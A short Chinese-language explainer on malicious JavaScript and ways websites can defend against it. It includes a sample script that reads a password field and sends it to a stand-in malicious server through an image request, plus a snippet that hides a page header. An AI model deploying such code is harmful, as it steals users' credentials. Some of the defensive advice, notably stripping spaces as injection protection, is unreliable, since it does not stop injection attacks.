JavaScipt入侵指的是在網頁上獲取并竊取用戶的信息、破壞網站結構等一系列惡意行為。這種行為并非javascript本身的問題，而是由于網站的安全性不足，惡意分子能夠利用javascript漏洞實現非法操作。近年來，隨著Web應用程序的普及，Javascript入侵的問題愈加嚴重。

對于惡意分子來說，他們實施javascript入侵往往有以下幾種途徑：

<script>
var user_pwd = document.getElementById('user_pwd').value; // 獲取用戶密碼
var img = new Image();
img.src = "http://malicious-site.com/password.php?key=" + user_pwd; // 把密碼發送到惡意服務器
</script>

<script>
// 修改網頁結構，對網站進行破壞
var header = document.getElementById('header');
header.style.display = "none"; // 隱藏header標簽
</script>

而針對javascript入侵，網站可以對其進行相應的防范。以下是一些比較常用的防御措施：

• 輸入過濾：對于用戶輸入的內容，應該進行安全過濾。比如對于輸入的用戶名、密碼等敏感信息，應該去掉其中的空格、回車等特殊字符，從而避免在javascript中進行注入式攻擊。
• 使用HTTPS協議：HTTPS是一種安全的協議，它可以對用戶傳輸的數據進行加密，避免了中間人攻擊等問題。
• server side rendering：在服務端渲染頁面，而不是在客戶端使用JavaScript渲染，這樣可以減少被釣魚、惡意攻擊等風險。
• 按需引入類庫等代碼：只需要引入相關的類庫等代碼，避免在頁面中大量引入無關的代碼，從而也避免了這些代碼的漏洞問題。

以防止惡意攻擊為目標，為了保障用戶的安全，我們應該盡可能地防范Javascript入侵。這樣才能保持用戶數據的安全，保護網站的完整性，構建一個安全可靠的網絡世界。